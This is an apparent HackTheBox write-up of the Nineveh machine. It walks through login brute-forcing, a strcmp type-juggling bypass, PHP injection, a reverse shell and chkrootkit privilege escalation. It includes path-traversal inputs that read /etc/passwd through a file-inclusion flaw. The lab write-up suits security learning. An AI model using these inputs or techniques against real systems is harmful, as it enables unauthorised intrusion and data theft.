HackTheBox_Nineveh w/o Metasploit
HTB - Nineveh
Enumeration
Nmap Scan Results
Supported HTTP Methods
Dirbusting Results for HTTP
Dirbusting Results for HTTPS
We have to specify -k flag
Visiting the Page
Vulnerabilities
phpLiteAdmin v1.9 Vulnerability
Exploitation
Brute-Forcing phpLiteAdmin Login Page
We obtained password 123. Now let’s try accessing and see what’s up.
We are greeted with a page where we can infer that there is a database named test with no tables.
PHP Injection Exploit
Accessing the Page from Earlier
Using Burp Suite, it shows the POST form as this. We assume the password check is hardcoded to be just a simple strcmp between two fields. If strcmp between two equal strings returns 0, which means it’s equal. If we give an invalid type as one of the fields, it will return null, which is comparable to 0. Let’s try this approach by modifying the POST data.
And boom, we’re in:
Local File Inclusion (LFI) Check
On visiting the notes page, we see the file is mentioned in the URL. Let’s check for LFI.
| notes parameter | Error Message |
|---|---|
| ninevehNotes.txt | No error, displays note |
| /etc/passwd | No Note is selected. |
| ../../../../../../../../../../etc/passwd | No Note is selected. |
| ninevehNotes | Warning: include(files/ninevehNotes): failed to open stream: No such file or directory in /var/www/html/department/manage.php on line 31 |
| ninevehNote | No Note is selected. |
| files/ninevehNotes/../../../../../../../../../etc/passwd | File name too long. |
| files/ninevehNotes/../../../../../../../etc/passwd | The contents of /etc/passwd |
| /ninevehNotes/../etc/passwd | The contents of /etc/passwd |
As long as ninevehNotes is in the parameter, we can access anything. Let’s try to access the shell we created earlier.
Command Execution Check
Let’s check for command execution with ls.
We can execute commands. Let’s try getting a reverse shell with Burp Suite now.
URL Encoded Reverse Shell Code
Nice, we have access as www-data. Now let’s escalate our privileges.
Privilege Escalation
Upgrading the Shell
Uploading and Running LinEnum
Let’s get linenum.sh on an HTTP server and make it available for this machine.
Exploring the amrois Folder
We can access the amrois folder but can’t view the flag. Let’s look around more.
amrois has access to only this folder.
Checking for Cron Jobs
Reports are made every minute. There may be a cron job behind this.
Let’s try creating our own script.
1
2
3
4
5
6
7
8
9
10
#!/bin/bash
#loop by line
IFS=$'\n'
old_process=$(ps -eo command)
while true; do
new_process=$(ps -eo command)
diff <(echo "$old_process") <(echo "$new_process") |grep [\<\>]
sleep 1
old_process=$new_process
done
Now we do chmod +x /procmon.sh followed by ./procmon.sh to run the script.
Identifying Vulnerabilities in Chkrootkit
We see that the cron jobs are executing /usr/bin/chkrootkit.
Chkrootkit vulnerabilities:
Using the identified vulnerability:
We have obtained root privilege. Let’s grab our flags.
Root Flag
User Flag
Comments powered by Disqus.